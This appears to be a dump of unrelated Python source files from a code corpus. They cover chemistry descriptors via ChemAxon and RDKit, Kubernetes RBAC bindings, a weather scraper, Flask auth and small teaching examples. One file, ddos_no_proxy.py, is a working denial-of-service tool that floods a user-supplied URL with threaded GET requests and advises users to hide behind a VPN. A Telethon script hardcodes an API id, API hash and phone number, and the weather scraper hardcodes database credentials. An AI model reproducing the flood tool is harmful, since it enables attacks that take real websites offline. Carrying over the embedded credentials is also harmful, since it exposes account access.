run("mv %s %s" % (current_path, backup))
# collect existing eggs previous to the installation
eggs_regex = os.path.join(base_path, 'django_orchestra-*.egg-info')
eggs = run('ls -d %s' % eggs_regex)
eggs = eggs.stdout.splitlines()
try:
if desired_version:
r('pip install django-orchestra==%s' % desired_version)
else:
# Did I mentioned how I hate PIP?
if run('pip --version|cut -d" " -f2').stdout == '1.0':
r('pip install django-orchestra --upgrade')
else:
# (Fucking pip)^2, it returns exit code 0 even when fails
# because requirement already up-to-date
r('pip install django-orchestra --upgrade --force')
except CommandError:
# Restore backup
run('rm -rf %s' % current_path)
run('mv %s %s' % (backup, current_path))
raise CommandError("Problem runing pip upgrade, aborting...")
else:
# Some old versions of pip do not performe this cleaning ...
# Remove all backups
run('rm -fr %s' % os.path.join(base_path, 'orchestra\.*'))
# Clean old egg files, yeah, cleaning PIP shit :P
c_version = 'from orchestra import get_version; print get_version()'
version = run('python -c "%s;"' % c_version).stdout
for egg in eggs:
# Do not remove the actual egg file when upgrading twice the same version
if egg.split('/')[-1] != "django_orchestra-%s.egg-info" % version:
run('rm -fr %s' % egg)
else:
raise CommandError("You don't seem to have any previous PIP installation")
# version specific upgrade operations
if not options.get('pip_only'):
call_command("postupgradeorchestra", version=current_version)
| 2.0625 | 2 |
src/uwds3_human_description/human_visual_model.py | uwds3/uwds3_human_description | 0 | 12786327 | <filename>src/uwds3_human_description/human_visual_model.py<gh_stars>0
import numpy as np
from sensor_msgs import CameraInfo
class HumanVisualModel(object):
FOV = 60.0 # human field of view
WIDTH = 90 # image width resolution for rendering
HEIGHT = 68 # image height resolution for rendering
CLIPNEAR = 0.3 # clipnear
CLIPFAR = 1e+3 # clipfar
ASPECT = 1.333 # aspect ratio for rendering
SACCADE_THRESHOLD = 0.01 # angular variation in rad/s
SACCADE_ESPILON = 0.005 # error in angular variation
FOCUS_DISTANCE_FIXATION = 0.1 # focus distance when performing a fixation
FOCUS_DISTANCE_SACCADE = 0.5 # focus distance when performing a saccade
def get_camera_info(self):
camera_info = CameraInfo()
width = HumanVisualModel.WIDTH
height = HumanVisualModel.HEIGHT
camera_info.width = width
camera_info.height = height
focal_length = height
center = (height/2, width/2)
camera_matrix = np.array([[focal_length, 0, center[0]],
[0, focal_length, center[1]],
[0, 0, 1]], dtype="double")
P_matrix = np.array([[focal_length, 0, center[0], 0],
[0, focal_length, center[1], 0],
[0, 0, 1, 0]], dtype="double")
dist_coeffs = np.zeros((4, 1))
camera_info.distortion_model = "blob"
camera_info.D = list(dist_coeffs)
camera_info.K = list(camera_matrix.flatten())
camera_info.P = list(P_matrix.flatten())
return camera_info
| 2.390625 | 2 |
src/app/data/mongopython.py | vaiskuma/Angular-first-App | 0 | 12786328 | import pymongo
from pymongo import MongoClient
connection = MongoClient ()
#client = MongoClient('localhost', 27017)
#The client object is thread-safe and has connection-pooling built in. If an operation fails because of a network error, ConnectionFailure is raised and the client reconnects in the background. Application code should handle this exception (recognizing that the operation failed) and then continue to execute.
# connect to the students database and the ctec121 collection
#db = connection.students.ctec121
db = connection.napp
collection = db.users
collection.find_one({"name":"name1"})
| 2.9375 | 3 |
Chapter01/19_iterator_example.py | add54/ADMIN_SYS_PYTHON | 116 | 12786329 | <filename>Chapter01/19_iterator_example.py<gh_stars>100-1000
numbers = [10, 20, 30, 40]
numbers_iter = iter(numbers)
print(next(numbers_iter))
print(next(numbers_iter))
print(numbers_iter.__next__())
print(numbers_iter.__next__())
next(numbers_iter)
| 3.375 | 3 |
tasks/task0018.py | jtprogru/interview-task | 3 | 12786330 | <reponame>jtprogru/interview-task
"""
Write a function that reverses a string. The input string is given as an array of characters s.
You must do this by modifying the input array in-place with O(1) extra memory.
Example 1:
Input: s = ["h","e","l","l","o"]
Output: ["o","l","l","e","h"]
Example 2:
Input: s = ["H","a","n","n","a","h"]
Output: ["h","a","n","n","a","H"]
Constraints:
- 1 <= s.length <= 105
- s[i] is a printable ascii character.
"""
from typing import List
def solution(s: List[str]) -> None:
start = 0
end = len(s) - 1
while start < end:
s[start], s[end] = s[end], s[start]
start += 1
end -= 1
| 3.984375 | 4 |
chemaxon.py | weishuzhao/group-contribution | 8 | 12786331 | <gh_stars>1-10
from subprocess import Popen, PIPE
import openbabel
import logging
import numpy as np
import StringIO
import re, csv
from rdkit import Chem
from rdkit.ML.Descriptors.MoleculeDescriptors import MolecularDescriptorCalculator
#from rdkit.Chem import Descriptors, GraphDescriptors, rdMolDescriptors #the list below defines all molecular descriptors available
class ChemAxonError(Exception):
pass
def RunCxcalc(molstring, args):
"""
Call cxcalc argument of ChemAxon from command line
:param molstring: smiles form or InChI strings of the molecule
:param args: name of molecular descriptors processed by cxcalc
:return: output from command line cxcalc requring further processing
"""
CXCALC_BIN = "cxcalc"
devnull = open('/dev/null', 'w')
try:
p1 = Popen(["echo", molstring], stdout=PIPE)
p2 = Popen([CXCALC_BIN] + args, stdin=p1.stdout,
executable=CXCALC_BIN, stdout=PIPE, stderr=devnull)
logging.debug("INPUT: echo %s | %s" % (molstring, ' '.join([CXCALC_BIN] + args)))
#p.wait()
#os.remove(temp_fname)
res = p2.communicate()[0]
if p2.returncode != 0:
raise ChemAxonError(debug_args)
logging.debug("OUTPUT: %s" % res)
return res
except OSError:
raise Exception("Marvin (by ChemAxon) must be installed to calculate pKa data.")
def Molconvert(molstring, args):
"""
Call molconvert argument of ChemAxon from command line
:param molstring: smiles form or InChI strings of the molecule
:param args: name of molecular descriptors processed by molconvert
:return: output from command line molconvert requring further processing
"""
MOLCONV_BIN = "molconvert"
devnull = open('/dev/null', 'w')
try:
p1 = Popen(["echo", molstring], stdout=PIPE)
p2 = Popen([MOLCONV_BIN] + args, stdin=p1.stdout,
executable=MOLCONV_BIN, stdout=PIPE, stderr=devnull)
logging.debug("INPUT: echo %s | %s" % (molstring, ' '.join([MOLCONV_BIN] + args)))
#p.wait()
#os.remove(temp_fname)
res = p2.communicate()[0]
if p2.returncode != 0:
raise ChemAxonError(debug_args)
logging.debug("OUTPUT: %s" % res)
return res
except OSError:
raise Exception("Marvin (by ChemAxon) must be installed")
def inchi2smiles(inchi):
openbabel.obErrorLog.SetOutputLevel(-1)
conv = openbabel.OBConversion()
conv.SetInAndOutFormats('inchi', 'smiles')
# conv.AddOption("F", conv.OUTOPTIONS)
# conv.AddOption("T", conv.OUTOPTIONS)
# conv.AddOption("x", conv.OUTOPTIONS, "noiso")
# conv.AddOption("w", conv.OUTOPTIONS)
obmol = openbabel.OBMol()
conv.ReadString(obmol, str(inchi))
smiles = conv.WriteString(obmol, True) # second argument is trimWhitespace
if smiles == '':
return None
else:
return smiles
def smiles2inchi(smiles):
openbabel.obErrorLog.SetOutputLevel(-1)
conv = openbabel.OBConversion()
conv.SetInAndOutFormats('smiles', 'inchi')
conv.AddOption("F", conv.OUTOPTIONS)
conv.AddOption("T", conv.OUTOPTIONS)
conv.AddOption("x", conv.OUTOPTIONS, "noiso")
conv.AddOption("w", conv.OUTOPTIONS)
obmol = openbabel.OBMol()
conv.ReadString(obmol, str(smiles))
inchi = conv.WriteString(obmol, True) # second argument is trimWhitespace
if inchi == '':
return None
else:
return inchi
def GetFormulaAndCharge(molstring):
"""
:param molstring: smiles form or InChI strings of the molecule
:return: chemical formula and charge of the molecule
"""
args = ['formula', 'formalcharge']
output = RunCxcalc(molstring, args)
# the output is a tab separated table whose columns are:
# id, Formula, Formal charge
f = StringIO.StringIO(output)
tsv_output = csv.reader(f, delimiter='\t')
headers = tsv_output.next()
if headers != ['id', 'Formula', 'Formal charge']:
raise ChemAxonError('cannot get the formula and charge for: ' + molstring)
_, formula, formal_charge = tsv_output.next()
try:
formal_charge = int(formal_charge)
except ValueError:
formal_charge = 0
return formula, formal_charge
def GetAtomBagAndCharge(molstring):
"""
:param molstring: smiles form or InChI strings of the molecule
:return: - a dictionary with key being atom value being number of atoms in the molecule
- charge of the molecule
"""
formula, formal_charge = GetFormulaAndCharge(molstring)
atom_bag = {}
for mol_formula_times in formula.split('.'):
for times, mol_formula in re.findall('^(\d+)?(\w+)', mol_formula_times):
if not times:
times = 1
else:
times = int(times)
for atom, count in re.findall("([A-Z][a-z]*)([0-9]*)", mol_formula):
if count == '':
count = 1
else:
count = int(count)
atom_bag[atom] = atom_bag.get(atom, 0) + count * times
return atom_bag, formal_charge
def _GetDissociationConstants(molstring, n_acidic=20, n_basic=20, pH=7.0):
"""
:param molstring: smiles form or InChI strings of the molecule
:return: A pair of (pKa list, major pseudoisomer)
- pKa list is of a list of pKa values in ascending order.
- the major pseudoisomer is a SMILES string of the major species at the given pH.
"""
args = []
if n_acidic + n_basic > 0:
args += ['pka', '-a', str(n_acidic), '-b', str(n_basic),
'majorms', '-M', 'true', '--pH', str(pH)]
output = RunCxcalc(molstring, args)
atom2pKa, smiles_list = ParsePkaOutput(output, n_acidic, n_basic)
all_pKas = []
for pKa_list in atom2pKa.values():
all_pKas += [pKa for pKa, _ in pKa_list]
return sorted(all_pKas), smiles_list
def ParsePkaOutput(s, n_acidic, n_basic):
"""
:param s: output of pKa values
:return: A dictionary that maps the atom index to a list of pKas that are assigned to that atom.
"""
atom2pKa = {}
pkaline = s.split('\n')[1]
splitline = pkaline.split('\t')
splitline.pop(0)
if n_acidic + n_basic > 0:
if len(splitline) != (n_acidic + n_basic + 2):
raise ChemAxonError('ChemAxon failed to find any pKas')
pKa_list = []
acid_or_base_list = []
for i in range(n_acidic + n_basic):
x = splitline.pop(0)
if x == '':
continue
pKa_list.append(float(x))
if i < n_acidic:
acid_or_base_list.append('acid')
else:
acid_or_base_list.append('base')
atom_list = splitline.pop(0)
if atom_list: # a comma separated list of the deprotonated atoms
atom_numbers = [int(x)-1 for x in atom_list.split(',')]
for i, j in enumerate(atom_numbers):
atom2pKa.setdefault(j, [])
atom2pKa[j].append((pKa_list[i], acid_or_base_list[i]))
smiles_list = splitline
return atom2pKa, smiles_list
def GetDissociationConstants(molstring, n_acidic=20, n_basic=20, pH=7):
"""
Get pKas and major microspecies of the molecule
:param molstring: smiles form or InChI strings of the molecule
:param n_acidic: the max no. of acidic pKas to calculate
:param n_basic: the max no. of basic pKas to calculate
:param pH: the pH for which the major pseudoisomer is calculated
:return: (all_pKas, major_ms)
- all_pKas is a list of floats (pKa values)
- major_ms is a SMILES string of the major pseudoisomer at pH_mid
"""
all_pKas, smiles_list = _GetDissociationConstants(molstring, n_acidic,
n_basic, pH)
major_ms = smiles_list[0]
pKas = sorted([pka for pka in all_pKas if pka > 0 and pka < 13], reverse=True)
return pKas, major_ms
def Get_pKas_Hs_zs_pH7smiles(molstring):
"""
:param molstring: smiles form or InChI strings of the molecule
:return: a list of pKas, a list of H atom number for each protonation state, a list of charges, index of major species at pH 7, the smiles form of the major
species at pH 7
"""
pKas, major_ms_smiles = GetDissociationConstants(molstring)
pKas = sorted([pka for pka in pKas if pka > 0 and pka < 13], reverse=True)
#print major_ms_smiles
if major_ms_smiles:
atom_bag, major_ms_charge = GetAtomBagAndCharge(major_ms_smiles)
major_ms_nH = atom_bag.get('H', 0)
else:
atom_bag = {}
major_ms_charge = 0
major_ms_nH = 0
n_species = len(pKas) + 1
if pKas == []:
majorMSpH7 = 0
else:
majorMSpH7 = len([1 for pka in pKas if pka > 7])
nHs = []
zs = []
for i in xrange(n_species):
zs.append((i - majorMSpH7) + major_ms_charge)
nHs.append((i - majorMSpH7) + major_ms_nH)
return pKas, nHs, zs, majorMSpH7, major_ms_smiles
def Calculate_total_Steric_hindrance(molstring):
"""
:param molstring: smiles form or InChI strings of the molecule
:return: total steric hindrance of the molecule
"""
# convert to smiles form if it is InChI string
if "InChI=" in molstring:
molstring = inchi2smiles(molstring)
molstring_with_explicit_Hs = Molconvert(molstring, ['smiles:H']).split('\n')[0]
steric_hindrance = sorted(map(float, RunCxcalc(molstring_with_explicit_Hs,['sterichindrance','-l','always']).split('\n')[1].split('\t')[1].split(';')))
return sum(steric_hindrance)
def Find_pos_of_double_bond_O(molstring):
"""
:param molstring: smiles form or InChI string of the molecule
:return: position of double bond oxygen atom in the list of atoms in molstring
"""
#convert to smiles form if it is InChI string
if "InChI=" in molstring:
molstring = inchi2smiles(molstring)
atoms_to_consider = ['C','O','N','S','P','c','n','Cl']
double_bond_O_pos = []
if 'O=C' in molstring:
double_bond_O_pos.append(0)
if 'O=c' in molstring:
double_bond_O_pos.append(0)
molstring_split_by_double_bond_O = molstring.split('=O')
if len(molstring_split_by_double_bond_O) > 1:
atom_num_in_fragments = []
for smiles_fragment in molstring_split_by_double_bond_O:
atom_num_in_fragments.append(sum([smiles_fragment.count(cur_atom) for cur_atom in atoms_to_consider]))
double_bond_O_pos_real = np.cumsum([atom_num + 1 for atom_num in atom_num_in_fragments])[:-1] #not counting from 0
double_bond_O_python_pos = list(np.array(double_bond_O_pos_real) - 1)
else:
double_bond_O_python_pos = []
double_bond_O_pos += double_bond_O_python_pos
return double_bond_O_pos
def Extract_individual_atom_partial_charge_and_labels(molstring):
"""
:param molstring: smiles form or InChI string of the molecule
:return: (atom_labels, atom_partial_charge)
- atom_labels is a list of atoms in the molecule specified by the their atom type
- atom_partial_charge is a list of partial charge for each atom in the molecule
"""
#convert to smiles form if it is InChI string
if "InChI=" in molstring:
molstring = inchi2smiles(molstring)
partial_charge_output = RunCxcalc(molstring, ['-M','charge','-i','True','-p','3'])
#depending on smiles, the partial charge output from chemaxon can have two different formats
if len(partial_charge_output.split('</atom>')) > 1:
#one particular output format
atom_labels = [re.findall('elementType=(.*)',element)[0].strip('"')[0] for element in partial_charge_output.split('</atom>') if 'elementType' in element]
atom_partial_charge = [re.findall('mrvExtraLabel=(.*) x2',element)[0].strip('"') for element in partial_charge_output.split('</atom>') if 'elementType' in element]
else:
#another particular output format
if 'formalCharge' in partial_charge_output:
atom_labels = re.findall('elementType=(.*) formalCharge',partial_charge_output)[0].strip('"').split(' ')
else:
atom_labels = re.findall('elementType=(.*) mrvExtraLabel',partial_charge_output)[0].strip('"').split(' ')
atom_partial_charge = re.findall('mrvExtraLabel=(.*) x2=',partial_charge_output)[0].strip('"').split(' ')
return atom_labels, atom_partial_charge
def Extract_atom_partial_charge(molstring, absolute_charge = True):
"""
Extract the total absolute partial charge for each type of atom
:param molstring: smiles form or InChI string of the molecule
:param absolute_charge: if we take the absolute value for the partial charge of each atom when calculating the total partial charge
:return: a dictionary with keys being atom type, values being total absolute partial charge of the type of atom
"""
#convert to smiles form if it is InChI string
if "InChI=" in molstring:
molstring = inchi2smiles(molstring)
atom_charge_dict = {'C':[],'H':[],'O':[],'O_double':[],'N':[],'S':[],'P':[],'Cl':[],'F':[],'Br':[],'I':[]} #Br and I as placeholder, currently don't have data to predict compounds containing these elements
total_charge_dict = {}
atom_labels, atom_partial_charge = Extract_individual_atom_partial_charge_and_labels(molstring)
double_bond_O_pos = Find_pos_of_double_bond_O(molstring)
H_charge_list = [float(re.findall('\((.*)\)',partial_charge)[0]) for partial_charge in atom_partial_charge if '(' in partial_charge]
#atom_labels correspond to all_other_atoms_charge_list
all_other_atoms_charge_list = [float(partial_charge.split('\\')[0]) for partial_charge in atom_partial_charge]
for i, atom_type in enumerate(atom_labels):
if atom_type == 'O':
if i in double_bond_O_pos:
atom_charge_dict['O_double'].append(all_other_atoms_charge_list[i])
else:
atom_charge_dict['O'].append(all_other_atoms_charge_list[i])
else:
atom_charge_dict[atom_type].append(all_other_atoms_charge_list[i])
if H_charge_list != []:
atom_charge_dict['H'] += H_charge_list
for atom_type, charge_list in atom_charge_dict.iteritems():
if charge_list != []:
if absolute_charge == True:
total_charge_dict[atom_type] = np.sum(abs(np.array(charge_list)))
else:
total_charge_dict[atom_type] = np.sum(np.array(charge_list))
return total_charge_dict
def Calculate_total_atom_num_and_partial_charge(molstring):
"""
:param molstring: smiles form or InChI string of the molecule
:return: a list of total atom number and absolute partial charge for each atom type
[C_partial_charge, C_atom_num, H_partial_charge, H_atom_num, O_partial_charge, O_atom_num, O_double_partial_charge, O_double_atom_num,
N_partial_charge, N_atom_num, S_partial_charge, S_atom_num, P_partial_charge, P_atom_num, F_partial_charge, F_atom_num, Cl_partial_charge, Cl_atom_num]
"""
cur_total_atom_num_partial_charge_array = []
atom_bag, _ = GetAtomBagAndCharge(molstring)
double_bond_O_num = len(Find_pos_of_double_bond_O(molstring))
if 'O' in atom_bag.keys():
single_bond_O_num = atom_bag['O'] - double_bond_O_num
atom_bag['O'] = single_bond_O_num
atom_bag['O_double'] = double_bond_O_num
partial_charge_dict = Extract_atom_partial_charge(molstring)
for atom_type in ['C','H','O','O_double','N','S','P','F','Cl']:
if atom_type in partial_charge_dict.keys():
cur_total_atom_num_partial_charge_array.append(partial_charge_dict[atom_type])
else:
cur_total_atom_num_partial_charge_array.append(0.0)
if atom_type in atom_bag.keys():
cur_total_atom_num_partial_charge_array.append(atom_bag[atom_type])
else:
cur_total_atom_num_partial_charge_array.append(0.0)
#total atomcount covered in molecular properties calculation
#cur_total_atom_num_partial_charge_array.append(sum(atom_bag.values()))
return cur_total_atom_num_partial_charge_array
def Calculate_chemaxon_mol_properties(molstring):
"""
Calculate the molecular descriptors available in ChemAxon
:param molstring: smiles form or InChI string of the molecule
:return: a list of ChemAxon molecular descriptors of the molecule
"""
args = ['atomcount','exactmass','averagemolecularpolarizability','axxpol','ayypol','azzpol','formalcharge',\
'molecularpolarizability','aliphaticatomcount','aliphaticbondcount','aliphaticringcount','aromaticatomcount',\
'aromaticbondcount','aromaticringcount','asymmetricatomcount','balabanindex','bondcount','carboaromaticringcount',\
'carboringcount','chainatomcount','chainbondcount','chiralcentercount','cyclomaticnumber','dreidingenergy',\
'fusedaromaticringcount','fusedringcount','hararyindex','heteroaliphaticringcount','heteroaromaticringcount',\
'heteroringcount','hyperwienerindex','largestringsize','largestringsystemsize','maximalprojectionarea',\
'maximalprojectionradius','maximalprojectionsize','minimalprojectionarea','minimalprojectionradius',\
'minimalprojectionsize','mmff94energy','molecularsurfacearea','plattindex','psa','randicindex','ringatomcount',\
'ringbondcount','ringcount','ringsystemcount','rotatablebondcount','smallestringsize','smallestringsystemsize',\
'stereodoublebondcount','szegedindex','volume','wienerindex','wienerpolarity','tautomercount','logp',\
'acceptorcount','acceptorsitecount','donorcount','donorsitecount','refractivity','resonantcount','asa','dipole']
chemaxon_output = RunCxcalc(molstring, args)
mol_property_names = chemaxon_output.split('\n')[0].split('\t')[1:]
mol_property_vals = chemaxon_output.split('\n')[1].split('\t')[1:]
try:
averagemicrospeciescharge = RunCxcalc(molstring, ['averagemicrospeciescharge']).split('\n')[1].split('\t')[2]
except IndexError:
averagemicrospeciescharge = RunCxcalc(molstring, ['formalcharge']).split('\n')[1].split('\t')[1]
mol_property_names.append('averagemicrospeciescharge')
mol_property_vals.append(averagemicrospeciescharge)
#both related to issues where logp of smiles cannot be calculated, such as H2 ([H][H]), raise a warning message regarding this issue
property_error_count = 0
for i, cur_property_val in enumerate(mol_property_vals):
if cur_property_val == 'logp:FAILED' or cur_property_val == '':
mol_property_vals[i] = '0'
property_error_count += 1
if property_error_count > 0:
print 'Problem calculating logp for %s, the molecular properties calculated might not be correct' %molstring
mol_property_vals = map(float, mol_property_vals)
double_bond = float(molstring.count('=')); mol_property_vals.append(double_bond); mol_property_names.append('double_bond_count')
triple_bond = float(molstring.count('#')); mol_property_vals.append(triple_bond); mol_property_names.append('triple_bond_count')
#print mol_property_names
return mol_property_vals
rdkit_descriptors = ['BalabanJ','BertzCT','FractionCSP3','HallKierAlpha','HeavyAtomCount','HeavyAtomMolWt',\
'Kappa1','Kappa2','Kappa3','LabuteASA', 'MaxAbsEStateIndex', 'MaxAbsPartialCharge', 'MaxEStateIndex', 'MaxPartialCharge',\
'MinAbsEStateIndex', 'MinAbsPartialCharge', 'MinEStateIndex', 'MinPartialCharge','MolLogP','MolMR','NHOHCount','NOCount',\
'NumHeteroatoms','NumRotatableBonds','NumValenceElectrons','TPSA']
rdkit_mol_descrip_calculator = MolecularDescriptorCalculator(rdkit_descriptors)
def Calculate_rdkit_mol_descriptors(mol_string):
"""
Calculate the molecular descriptors available in RDkit
:param mol_string: smiles form or InChI string of the molecule
:return: a list of RDkit molecular descriptors of the molecule
"""
if 'InChI=' in mol_string:
mol_string = inchi2smiles(mol_string)
cur_molecule = Chem.MolFromSmiles(mol_string)
cur_mol_properties = rdkit_mol_descrip_calculator.CalcDescriptors(cur_molecule)
return list(cur_mol_properties)
def Calculate_mol_properties(mol_string):
"""
Calculate all molecular descriptors on partial charge, steric hindrance, ChemAxon and RDkit molecular descriptors
:param mol_string: smiles form or InChI string of the molecule
:return: the molecular descriptors of the molecule
"""
if 'InChI=' in mol_string:
mol_string = inchi2smiles(mol_string)
total_atom_num_and_partial_charge = Calculate_total_atom_num_and_partial_charge(mol_string)
total_steric_hindrance = [Calculate_total_Steric_hindrance(mol_string)]
chemaxon_mol_properties = Calculate_chemaxon_mol_properties(mol_string)
rdkit_mol_properties = Calculate_rdkit_mol_descriptors(mol_string)
all_mol_properties = total_atom_num_and_partial_charge + total_steric_hindrance + chemaxon_mol_properties + rdkit_mol_properties
return all_mol_properties | 2.328125 | 2 |
Z_ALL_FILE/Py1/omt.py | omikabir/omEngin | 0 | 12786332 | from telethon.sync import TelegramClient
from telethon.sessions import StringSession
from pprint import pprint
import os
api_id = 628127
api_hash = 'db7fa09d585d6eedddd0df5973f3239b'
phone = '+8801817184338'
client = TelegramClient(phone, api_id, api_hash)
client.connect()
if not client.is_user_authorized():
client.send_code_request(phone)
client.sign_in(phone, input('Enter the code: '))
async def main():
st = ""
async for dialog in client.iter_dialogs():
try:
st1 = str(dialog.id)
st2 = st1[0]
if st2 == chr(45):
st = st + "\n" + str(dialog.id) + ',' + str(dialog.name)
except:
pass
return st
def wrt_content(st):
try:
file = os.getcwd() + "//omgroup//omgrp.txt"
fl = open(file, "w+", encoding="utf-8")
fl.write(st)
fl.close()
except:
file = os.getcwd() + "//omgrp.txt"
fl = open(file, "w+", encoding="utf-8")
fl.write(st)
fl.close()
return file
def client_run():
with client:
sx = client.loop.run_until_complete(main())
fl = wrt_content(sx)
return fl
| 2.5 | 2 |
ddos_no_proxy.py | ph-fox/dos | 0 | 12786333 | #!/usr/bin/python3
import requests, threading, os, readline, optparse
from colorama import Fore
read = optparse.OptionParser()
read.add_option('-u', '--url',help="Enter Website url", dest='url')
(value, key) = read.parse_args()
url = value.url
if url is None:
print("Coded by: <NAME>")
print("github: https://github.com/abalesluke")
print("Note: i am no longer responsible for any misuse of this tool!.")
print("\nTip: before executing this code you can also use -u flag\neg.[python3 reqflood.py -u <url>]")
print("You must Use vpn when using this!, cuz this version doesnt use proxy\n")
url = input('Enter url: ')
else:
pass
count = 0
def flood():
try:
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"}
for x in range(100):
r = requests.get(url, headers=header)
global count
count+=1
print(f'{Fore.GREEN}[{Fore.CYAN}{count}{Fore.GREEN}] {Fore.CYAN}request/s sent to: {Fore.GREEN}{url} [{Fore.MAGENTA}{r.status_code}{Fore.GREEN}]')
except KeyboardInterrupt:
exit(0)
except:
pass
threads = []
while True:
for i in range(100):
x = threading.Thread(target=flood)
x.daemon = True
threads.append(x)
for i in range(100):
threads[i].start()
for i in range(100):
threads[i].join()
| 2.8125 | 3 |
esk/controller/models/secretbindings.py | esk8s/esk | 1 | 12786334 | <reponame>esk8s/esk
import kubernetes
class SecretBinding:
def __init__(self, name, namespace, service_account, secrets, target = None, template = None):
self.__name = name
self.__namespace = namespace
self.__service_account = service_account
self.__secrets = secrets
self.__target = target if target is not None else f"/esk/secrets/{ name }"
self.__template = template
def compare_spec(self, spec):
'''
Compare a spec with self.spec, return true if the same
'''
return self.__target == spec.get('target') and self.__template == spec.get('template')
def to_k8s_resources(self):
'''
Transform this binding to a kubernetes role and role binding
'''
role = kubernetes.client.V1Role(
metadata = kubernetes.client.V1ObjectMeta(
name = self.__name,
namespace = self.__namespace
),
rules = [
kubernetes.client.V1PolicyRule(
api_groups = ['esk.io'],
resources = ['externalsecrets'],
resource_names = [ s.get('name') for s in self.__secrets ],
verbs = ['get']
),
kubernetes.client.V1PolicyRule(
api_groups = ['esk.io'],
resources = ['secretbindings'],
resource_names = [self.__name],
verbs = ['get']
)
]
)
role_binding = kubernetes.client.V1RoleBinding(
role_ref = kubernetes.client.V1RoleRef(
api_group = 'rbac.authorization.k8s.io',
kind = 'Role',
name = self.__name
),
metadata = kubernetes.client.V1ObjectMeta(
name = self.__name,
namespace = self.__namespace
),
subjects = [
kubernetes.client.V1Subject(
kind = 'ServiceAccount',
name = self.__service_account,
namespace = self.__namespace
)
]
)
return role, role_binding
def get_spec(self):
return {
'serviceAccount': self.__service_account,
'secrets': self.__secrets,
'target': self.__target,
'template': self.__template
}
def get_namespace(self):
return self.__namespace
def get_name(self):
return self.__name
def get_target(self):
return self.__target
def get_template(self):
return self.__template | 2.265625 | 2 |
ED_remoto/auth.py | fabriciocgf/Remote_Lab_FPGA | 0 | 12786335 | <reponame>fabriciocgf/Remote_Lab_FPGA
"""Routes for user authentication."""
from flask import redirect, render_template, flash, Blueprint, request, url_for
from .forms import LoginForm, SignupForm
from .models import db, User
# Blueprint Configuration
auth_bp = Blueprint('auth_bp', __name__,
template_folder='templates',
static_folder='static')
@auth_bp.route('/signup', methods=['GET', 'POST'])
def signup():
return render_template('signup.jinja2',
title='Create an Account.',
form=signup_form,
template='signup-page',
body="Sign up for a user account.")
@auth_bp.route('/login', methods=['GET', 'POST'])
def login():
return render_template('login.jinja2',
form=login_form,
title='Log in.',
template='login-page',
body="Log in with your User account.")
| 2.453125 | 2 |
Dublin_Bikes/weather_scraper/weatherScraper.py | TeamCGS/Dublin_Bikes | 0 | 12786336 | import json
import requests
from sqlalchemy import Column, Integer, String, Float, Boolean
from pprint import pprint
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from base_file import Base
import time
import datetime
class Weather(Base):
"""
Create a Weather table
"""
__tablename__ = 'weather1'
id = Column(Integer, nullable=False, primary_key ='True')
name = Column(String(100), nullable = False)
humidity = Column(Integer ,nullable = False)
temp = Column(Integer, nullable=False)
temp_max = Column(Integer, nullable=False)
temp_min = Column(Integer, nullable=False)
description = Column(String(100), nullable = False)
icon = Column(String(100), nullable = False)
main_description = Column(String(100), nullable = False)
timeDate = Column(String (100), primary_key=True, nullable=False)
def getWeatherData(self):
weather_engine = create_engine('mysql+mysqlconnector://CGSdatabase:[email protected]/dublinbikes', convert_unicode=True)
Session = sessionmaker(bind=weather_engine)
talk_session = Session()
Base.metadata.create_all(bind=weather_engine)
while True:
try:
STATIONS_URI = "api.openweathermap.org/data/2.5/weather?"
api_url = 'http://api.openweathermap.org/data/2.5/weather'
appid = "033bc70c21f56a4af381b76c18f81458"
r = requests.get(url=api_url, params=dict(q='Dublin', APPID=appid))
#pprint(r)
data = r.json()
#pprint(data)
self.writeToDatabase(weather_engine,talk_session,data)
time.sleep(30*60)
except:
if weather_engine is None:
print(traceback.format_exc())
talk_session.close()
return
def writeToDatabase(self, weather_engine, talk_session, data):
self.data = data
now = datetime.datetime.now()
weather = Weather(id=self.data["id"],
name=self.data["name"],
humidity=self.data["main"]["humidity"],
temp_max=self.data["main"]["temp_max"],
temp_min=self.data["main"]["temp_min"],
temp=self.data["main"]["temp"],
description=self.data["weather"][0]["description"],
icon=self.data["weather"][0]["icon"],
main_description=self.data["weather"][0]["main"],
timeDate=now)
talk_session.add(weather)
talk_session.commit()
return
| 2.859375 | 3 |
tsadm/ansible/inventory/__init__.py | jctincan/tsadm-webapp | 0 | 12786337 |
from . import groupvars
from . import hostvars
wapp = None
def __init():
groupvars.wapp = wapp
hostvars.wapp = wapp
def getinv():
__init()
master_server = wapp.conf.get('MASTER_SERVER')
slave_all = wapp.db.slave_all()
hosts_all = [h['fqdn'] for h in slave_all]
hosts_all.append(master_server)
inv = {
'all': {
'hosts': hosts_all,
'vars': groupvars.hosts_all()
},
'master_server': {
'hosts': [master_server],
'vars': groupvars.master_server()
},
'slave_servers': {
'hosts': [h['fqdn'] for h in slave_all],
'vars': {}
},
'_meta': {
'hostvars': hostvars.getall(slave_all),
}
}
return inv
| 2.46875 | 2 |
src/pycsd/test/test_csd_integers.py | luk036/ellpy | 7 | 12786338 | #! /usr/bin/env python3
"""
Unittests for the CSD module
"""
import unittest
import pycsd.csd as csd
good_values_dict = {
32: '+00000',
-32: '-00000',
0: '0',
7: '+00-',
15: '+000-'
}
class tests__integers(unittest.TestCase):
def test__01_to_integer(self):
""" Check conversion from CSD to integer """
for key in good_values_dict.keys():
csd_str = good_values_dict[key]
value = csd.to_decimal(csd_str)
self.assertEqual(value, key)
def test__02_to_csd(self):
""" Check that integers are converted to CSD properly. """
for key in good_values_dict.keys():
csd_str = csd.to_csd(key)
self.assertEqual(csd_str, good_values_dict[key])
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(tests__integers))
return suite
if __name__ == '__main__':
unittest.main()
| 3.5625 | 4 |
5_asyncio/future_threadpool_deadlock.py | Nataliyi/async | 5 | 12786339 | <filename>5_asyncio/future_threadpool_deadlock.py
from concurrent.futures import ThreadPoolExecutor
import time
a_future = None
b_future = None
def wait_on_b():
time.sleep(2) # blocking events
print(b_future.result()) # b_future will never complete because it is waiting on a_future.
return 5
def wait_on_a():
time.sleep(2)
print(a_future.result()) # a_future will never complete because it is waiting on b_future.
return 6
# It will deadlock because they are sharing the same process, i.e sharing variables
if __name__ == '__main__':
executor = ThreadPoolExecutor(max_workers=2)
print(f"started at {time.strftime('%X')}")
a_future = executor.submit(wait_on_b) # return 5
b_future = executor.submit(wait_on_a) # return 6
